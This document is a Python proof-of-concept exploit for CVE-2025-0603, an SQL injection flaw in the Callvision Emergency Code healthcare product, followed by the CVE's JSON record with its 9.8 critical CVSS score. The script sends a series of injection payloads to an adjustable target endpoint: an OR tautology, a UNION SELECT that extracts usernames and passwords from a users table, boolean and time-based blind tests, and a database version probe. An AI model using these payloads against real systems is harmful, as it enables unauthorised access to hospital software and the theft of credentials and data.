CVE-2025-0603

# CVE-2025-0603 - Callvision Emergency Code SQL Injection PoC # Vulnerability: SQL Injection (including Blind SQL Injection) # Affected: Callvision Emergency Code before V3.0 # CVSS: 9.8 (CRITICAL) import requests TARGET_URL = "http://target-host/callvision/endpoint" # Adjust the target endpoint INJECTION_PARAM = "id" # Adjust the vulnerable parameter name def normal_request(param_value): """Send a normal request to compare responses""" params = {INJECTION_PARAM: param_value} response = requests.get(TARGET_URL, params=params, timeout=10) return response def test_sql_injection(): """Test for SQL Injection vulnerability""" # Test 1: Basic SQL Injection detection payload = "1' OR '1'='1" response = normal_request(payload) print(f"[+] Test 1 - Basic SQLi payload: {payload}") print(f"[+] Response status: {response.status_code}") print(f"[+] Response length: {len(response.text)}") # Test 2: UNION-based SQL Injection to extract data union_payload = "1' UNION SELECT NULL,username,password FROM users-- -" response = normal_request(union_payload) print(f"\n[+] Test 2 - UNION-based SQLi: {union_payload}") print(f"[+] Response: {response.text[:500]}") # Test 3: Boolean-based Blind SQL Injection true_payload = "1' AND 1=1-- -" false_payload = "1' AND 1=2-- -" true_response = normal_request(true_payload) false_response = normal_request(false_payload) print(f"\n[+] Test 3 - Boolean-based Blind SQLi") print(f"[+] True condition response length: {len(true_response.text)}") print(f"[+] False condition response length: {len(false_response.text)}") if len(true_response.text) != len(false_response.text): print("[!] Boolean-based Blind SQL Injection confirmed!") # Test 4: Time-based Blind SQL Injection time_payload = "1' AND SLEEP(5)-- -" import time start = time.time() response = normal_request(time_payload) elapsed = time.time() - start print(f"\n[+] Test 4 - Time-based Blind SQLi") print(f"[+] Elapsed time: {elapsed:.2f} seconds") if elapsed > 4: print("[!] Time-based Blind SQL Injection confirmed!") # Test 5: Extract database version (MySQL assumed) version_payload = "1' AND (SELECT SUBSTRING(@@version,1,1))='5'-- -" response = normal_request(version_payload) print(f"\n[+] Test 5 - Database version fingerprinting") if __name__ == "__main__": print("=" * 60) print("CVE-2025-0603 PoC - Callvision Emergency Code SQL Injection") print("=" * 60) test_sql_injection()

{"cve": {"id": "CVE-2025-0603", "sourceIdentifier": "[email protected]", "published": "2025-10-07T12:15:38.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Callvision Healthcare Callvision Emergency Code allows SQL Injection, Blind SQL Injection.This issue affects Callvision Emergency Code: before V3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0320", "source": "[email protected]"}]}}